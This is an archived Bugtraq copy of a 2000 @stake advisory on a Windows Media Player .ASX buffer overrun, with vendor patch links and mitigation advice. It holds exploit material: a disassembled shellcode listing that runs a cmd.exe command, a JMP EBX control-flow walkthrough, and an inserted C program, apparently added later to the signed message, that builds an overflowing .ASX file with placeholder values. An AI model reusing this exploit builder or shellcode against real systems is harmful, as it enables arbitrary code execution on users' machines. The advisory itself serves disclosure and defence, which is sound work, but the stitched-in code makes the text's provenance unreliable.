Bugtraq mailing list archives
@stake Advisory: Windows 2000 .ASX Buffer Overrun (A112300-1)
From: "@stake Advisories" <advisories () ATSTAKE COM>
Date: Thu, 23 Nov 2000 10:46:11 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

@stake Inc.
www.atstake.com
Security Advisory

Advisory Name: Windows 2000 .ASX Buffer Overrun
Release Date: 11/23/2000
Application: Microsoft Windows Explorer with Microsoft Media Player v6.xx and Microsoft Media Player v7.xx
Platform: Windows 2000 SP1
Severity: There is a buffer overflow condition that can result in execution of arbitrary code.
Authors: Ollie Whitehouse [ollie () atstake com]
Vendor Status: vendor has released patch
Web: www.atstake.com/research/advisories/2000/a112300-1.txt

Overview:

Microsoft Windows Media Player (http://www.microsoft.com/) plays streaming media files which have the extension .ASX. There is a buffer overrun caused by the way that WMP handles the .ASX file format when using the Web View option in Windows Explorer (enabled by default). This problem can allow the execution of arbitrary code.

One method of exploitation requires the user to save the .ASX file to the local machine and navigate to it in Explorer. Single-clicking the file once causes Explorer to auto-preview the streaming media file whose destination is specified in the .ASX file. Passing an overly long destination for this media file causes the buffer overrun to occur and the arbitrary code to execute.

This is another good example of why attachments from unknown sources should not be trusted, and of why systems/network administrators should evaluate the types of attachments which are allowed to reach users' desktops, even when those attachments do not contain any executable code.

There are other methods of exploitation which could allow .ASX files to be opened automatically when a user visits a malicious web site. This can be prevented by configuring Internet Explorer not to run ActiveX controls.

Proof of Concept:

The following file, once uncompressed, contains 'Explorer-Win2k-BufferOverrun.asx'.
Once this file is previewed within Explorer with a single click, it will cause Explorer to create a file in the root of C: called !test!. This file will contain a directory listing of the current working directory at the time the proof of concept is executed. After the proof of concept has run, Explorer.exe will need to be restarted.

This example has been hardcoded to work with Windows 2000 (SP1) and MSVCRT.DLL v6.1.8637. Another reason the example is service-pack specific is that the code lands at a variable location on the stack (so EIP cannot be pointed directly at the arbitrary code); the exploit instead relies on EBX being located 4 bytes before EIP. The example overwrites EIP with the address of a JMP EBX instruction (encoded FF E3; FF E2 is JMP EDX), which is contained in kernel32 and is therefore static for a given build. Execution then passes through the four bytes at EBX (which contain NOPs), then through the four bytes of the overwritten EIP (which, fortunately, do not decode to anything that alters or stops program flow), and finally reaches the arbitrary code placed on the stack. The assembly code executed at that point is listed at the end of this advisory. Within the ASX file the example code is located at offset 00005ce4h.
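The stack picture described above (filler up to the slot that ends up in EBX, four NOPs in that slot, the address of a JMP EBX gadget in the EIP slot, then the code), together with the bounded href copy a fixed viewer needs, as an added example in C. This is not @stake's proof of concept and not Microsoft's code: the offset EBX_SLOT_OFFSET, the gadget address 0x77E8AAAA and the INT3 payload are placeholders that would have to be measured in a debugger against the target build, and build_href, build_asx, href_bad_byte and asx_copy_href are names chosen for this example.

```c
/* Added example, not @stake's PoC. Builds a long-href .ASX in the stack
 * layout the advisory describes and shows the bounded href copy a fixed
 * parser needs. Offset, gadget address and payload are placeholders. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ASX_HEAD "<ASX version=\"3.0\">\r\n<Entry>\r\n<Ref href=\""
#define ASX_TAIL "\"/>\r\n</Entry>\r\n</ASX>\r\n"

/* ASSUMPTIONS: bytes of href before the slot that lands in EBX, and the
 * address of a JMP EBX (FF E3) gadget. The advisory gives neither. */
#define EBX_SLOT_OFFSET 1024u
#define JMP_EBX_GADGET  0x77E8AAAAu   /* placeholder; no NUL or '"' bytes */

/* Placeholder payload: INT3s, so an attached debugger shows control
 * reached the stack. The advisory's own listing would go in this slot. */
static const uint8_t BREAKPOINTS[4] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Index of the first byte an href attribute cannot carry (NUL ends the
 * viewer's C string, '"' closes the attribute), or -1 if clean. */
long href_bad_byte(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0x00 || p[i] == '"') return (long)i;
    return -1;
}

/* Lay out the href body. Returns bytes written, 0 if out is too small. */
size_t build_href(uint8_t *out, size_t outsz, uint32_t gadget,
                  const uint8_t *code, size_t codelen)
{
    size_t need = EBX_SLOT_OFFSET + 4 + 4 + codelen;
    if (outsz < need) return 0;
    memset(out, 'A', EBX_SLOT_OFFSET);            /* filler up to EBX slot */
    uint8_t *p = out + EBX_SLOT_OFFSET;
    memset(p, 0x90, 4);                           /* NOPs at EBX: run first */
    p += 4;
    p[0] = (uint8_t)gadget;         p[1] = (uint8_t)(gadget >> 8);  /* EIP */
    p[2] = (uint8_t)(gadget >> 16); p[3] = (uint8_t)(gadget >> 24); /* LE  */
    p += 4;                /* those 4 bytes are also executed as code */
    memcpy(p, code, codelen);                     /* then the payload */
    return need;
}

/* Wrap the href in a minimal ASX (malloc'd, caller frees); NULL if the
 * href holds a byte the attribute cannot carry. */
uint8_t *build_asx(size_t *outlen, const uint8_t *href, size_t hreflen)
{
    if (href_bad_byte(href, hreflen) >= 0) return NULL;
    size_t hl = strlen(ASX_HEAD), tl = strlen(ASX_TAIL);
    uint8_t *buf = malloc(hl + hreflen + tl);
    if (!buf) return NULL;
    memcpy(buf, ASX_HEAD, hl);
    memcpy(buf + hl, href, hreflen);
    memcpy(buf + hl + hreflen, ASX_TAIL, tl);
    *outlen = hl + hreflen + tl;
    return buf;
}

static long find_bytes(const uint8_t *h, size_t hl, const char *needle)
{
    size_t nl = strlen(needle);
    for (size_t i = 0; i + nl <= hl; i++)
        if (memcmp(h + i, needle, nl) == 0) return (long)i;
    return -1;
}

/* What a fixed viewer must do instead of strcpy into a fixed stack buffer:
 * measure the href against the destination before copying a byte, and
 * refuse an over-long one rather than truncate it (a truncated path would
 * silently open a different file). Returns the href length, -1 if the
 * attribute is missing or unterminated, -2 if it would not fit. */
long asx_copy_href(const uint8_t *asx, size_t asxlen, char *dest, size_t destsz)
{
    long at = find_bytes(asx, asxlen, "href=\"");
    if (at < 0) return -1;
    size_t start = (size_t)at + 6, end = start;
    while (end < asxlen && asx[end] != '"') end++;
    if (end == asxlen) return -1;
    size_t len = end - start;
    if (len >= destsz) return -2;
    memcpy(dest, asx + start, len);
    dest[len] = '\0';
    return (long)len;
}

int main(int argc, char **argv)
{
    uint8_t href[4096];
    size_t n = build_href(href, sizeof href, JMP_EBX_GADGET, BREAKPOINTS, 4);
    size_t len;
    uint8_t *asx = n ? build_asx(&len, href, n) : NULL;
    if (!asx) return 1;
    FILE *f = fopen(argc > 1 ? argv[1] : "long-href.asx", "wb");
    if (!f) return 1;
    fwrite(asx, 1, len, f);
    fclose(f);
    char dest[260];   /* MAX_PATH-sized destination, as a viewer might use */
    printf("wrote %zu bytes; bounded copy returns %ld\n", len, asx_copy_href(asx, len, dest, sizeof dest));
    free(asx);
    return 0;
}
```

The generated file is only useful against a lab copy of the affected build with a debugger attached to Explorer.exe; the two constants would be adjusted from what the debugger shows at the crash. The bounded copy returns -2 for that file and a normal length for an ordinary mms:// reference, which is the behaviour the vendor patch has to provide.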
Proof of concept ASX File:

An ASX file which contains the problem is contained in this .zip file:
http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip

<-----<Assembly code for proof of concept>-----

(The sequence of mov byte ptr instructions builds the string cmd.exe/cdir>c:\!test! on the stack, which is how the directory listing described above is produced.)

[Byte Code]        [Assembly]
90                 nop
8B DC              mov ebx,esp
8B E3              mov esp,ebx
53                 push ebx
8B DC              mov ebx,esp
33 FF              xor edi,edi
57                 push edi
57                 push edi
57                 push edi
57                 push edi
57                 push edi
57                 push edi
57                 push edi
C6 43 E9 63        mov byte ptr [ebx-17h],63h
C6 43 EA 6D        mov byte ptr [ebx-16h],6Dh
C6 43 EB 64        mov byte ptr [ebx-15h],64h
C6 43 EC 2E        mov byte ptr [ebx-14h],2Eh
C6 43 ED 65        mov byte ptr [ebx-13h],65h
C6 43 EE 78        mov byte ptr [ebx-12h],78h
C6 43 EF 65        mov byte ptr [ebx-11h],65h
C6 43 F0 2F        mov byte ptr [ebx-10h],2Fh
C6 43 F1 63        mov byte ptr [ebx-0Fh],63h
C6 43 F2 64        mov byte ptr [ebx-0Eh],64h
C6 43 F3 69        mov byte ptr [ebx-0Dh],69h
C6 43 F4 72        mov byte ptr [ebx-0Ch],72h
C6 43 F5 3E        mov byte ptr [ebx-0Bh],3Eh
C6 43 F6 63        mov byte ptr [ebx-0Ah],63h
C6 43 F7 3A        mov byte ptr [ebx-9],3Ah
C6 43 F8 5C        mov byte ptr [ebx-8],5Ch
C6 43 F9 21        mov byte ptr [ebx-7],21h
C6 43 FA 74        mov byte ptr [ebx-6],74h
C6 43 FB 65        mov byte ptr [ebx-5],65h
C6 43 FC 73        mov byte ptr [ebx-4],73h
C6 43 FD 74        mov byte ptr [ebx-3],74h
C6 43 FE 21        mov byte ptr [ebx-2],21h
B8 AD AA 01 78     mov eax,7801AAADh
50                 push eax
8D 43 E9           lea eax,[ebx-17h]
50                 push eax
FF 53 E4           call dword ptr [ebx-1Ch]
56                 push esi
BB 2D F3 E8 77     mov ebx,77E8F32Dh
FF D3              call ebx
C3                 ret

<-----<End of code for proof of concept>-----

Vendor Response:

Microsoft has released a security bulletin describing the issue:
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp

Microsoft has released patches for Windows Media Player:

Windows Media Player 6.4:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069

Windows Media Player 7:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067

Recommendation:

The best solution is to install the vendor patch for your version of the media player.
This solves this specific problem. In general, unless you need to run ActiveX controls, it is a good idea to configure Internet Explorer not to run them. At the very least you can configure IE not to run ActiveX controls in the Internet security zone. It doesn't matter whether the controls are signed or not; as you can see from this advisory, even signed controls can have security problems. Of course, never trust attachments from unknown sources, even data files such as the .ASX files discussed in this advisory.

For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0

iQA/AwUBOh07oVESXwDtLdMhEQJTMwCeKP4OnGqIS9GcKHSCBOaAyFdahJoAn37+
L5L7UwBkJOH5n0TQ0i2Qr3uY
=DkFu
-----END PGP SIGNATURE-----